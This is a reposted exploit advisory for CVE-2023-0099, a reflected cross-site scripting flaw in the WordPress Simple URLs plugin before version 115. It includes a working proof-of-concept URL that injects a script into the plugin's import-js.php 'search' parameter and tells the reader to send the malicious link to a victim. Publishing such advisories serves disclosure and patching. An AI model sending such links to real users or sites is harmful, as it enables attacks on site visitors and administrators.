Home Tools Exploits & CVE's WordPress Simple URLs Cross Site Scripting

WordPress Simple URLs Cross Site Scripting

February 9, 2024

163

WordPress Simple URLs plugin versions prior to 115 suffer from a cross site scripting vulnerability.

advisories | CVE-2023-0099

# Exploit Title: simple urls < 115  XSS
# Google Dork:
# Exploit Author: AmirZargham
# Vendor Homepage: https://getlasso.co/
# Software Link: https://wordpress.org/plugins/simple-urls/
# Version: < 115
# Tested on: firefox,chrome
# CVE: CVE-2023-0099
# CWE: CWE-79
# Platform: MULTIPLE
# Type: WebApps


Description
The Simple URLs WordPress plugin before 115 does not sanitise and escape
some parameters before outputting them back in some pages, leading to
Reflected Cross-Site Scripting.


Usage Info:

send malicious link to victim:
https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=
<script>alert(origin)</script>

WordPress Simple URLs Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

osCommerce 4 Cross Site Scripting

undefinedExploiting The NT Kernel In 24H2undefined

Windows NtQueryInformationThread Double-Fetch / Arbitrary Write

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Zimbra Collaboration Suite TAR Path Traversal

Netsia SEBA+ 0.16.1 Authentcation Bypass / Add Root User

Backdoor.Win32.Zhangpo Denial Of Service